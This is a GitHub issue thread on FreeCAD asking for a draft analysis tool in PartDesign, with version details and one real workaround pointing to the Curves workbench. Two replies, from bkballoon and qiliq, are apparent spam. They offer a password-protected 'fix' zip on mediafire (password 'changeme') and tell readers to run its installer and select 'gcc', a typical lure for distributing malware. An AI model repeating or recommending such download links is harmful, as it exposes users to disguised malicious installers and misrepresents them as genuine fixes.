FreeCAD/FreeCAD #16099: PartDesign: Draft Analysis not available

maxwxyz, 2024-08-28:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

Currently there is no option to perform a draft analysis to inspect the model to be able to analyze whether the part model is manufacturable based on the draft condition applied. 
It is necessary that the part can be removed easily from the panel dies (in case of Sheet metal part) or Mold (in case of casting).

Implementation in CATIA:
https://skill-lync.com/blogs/all-about-draft-analysis-using-catia

[image]

[image]

### Full version info

```shell
OS: Windows 10 build 19045
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38553 (Git)
Build type: Release
Branch: main
Hash: 59c1ccec3e6b70f56eeee8f94d361019b84bd850
Python 3.11.9, Qt 5.15.13, Coin 4.0.2, Vtk 9.2.6, OCC 7.7.2
Locale: German/Germany (de_DE)
Installed mods: 
  * Curves 0.6.42
  * fasteners 0.5.25
  * freecad.gears 1.2.0
  * Manipulator 1.5.7
```

### Subproject(s) affected?

PartDesign

### Anything else?

Maybe related to the implementation of 
https://github.com/FreeCAD/FreeCAD/issues/15028

@pierreporte FYI

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

bkballoon, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

FEA-eng, 2024-08-28:
As a workaround, it's possible in the add-on Curves workbench: https://www.youtube.com/watch?v=dEIiLDbdqdE

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."